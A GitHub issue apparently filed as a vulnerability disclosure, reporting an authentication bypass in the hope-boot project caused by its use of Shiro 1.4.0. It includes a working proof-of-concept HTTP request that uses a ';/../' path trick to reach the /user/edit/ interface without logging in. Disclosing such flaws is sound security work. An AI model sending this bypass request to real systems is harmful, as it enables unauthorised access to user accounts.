hope-boot icon indicating copy to clipboard operation
hope-boot copied to clipboard
verified publisher icon java-aodeng

There is an Incorrect Access Control vulnerability in hope-boot

Open RacerZ-fighting opened this issue 1 year ago • 0 comments

[Suggested description] hope-boot was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.

[Vulnerability Type] Incorrect access control

[Vendor of Product] https://github.com/java-aodeng/hope-boot

[Affected Product Code Base] all version (<= 1.0.0-release)

[Affected Component] /user/edit/ interface

[Attack Type] Remote

[Vulnerability details] Send the payload below to the interface /user/edit/

GET /login;/../user/edit/1 HTTP/1.1
Host: localhost:8886
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: localhost:8886
Connection: keep-alive
image image [Cause of vulnerability] Shiro is used for authentication in hope-boot, but version 1.4.0 contains an insecure implementation image Meanwhile, hope-boot includes some interfaces configured without permission requirements, enabling the exploitation of vulnerabilities in Shiro's implementation to achieve authentication bypass. image

RacerZ-fighting avatar Nov 24 '24 05:11 RacerZ-fighting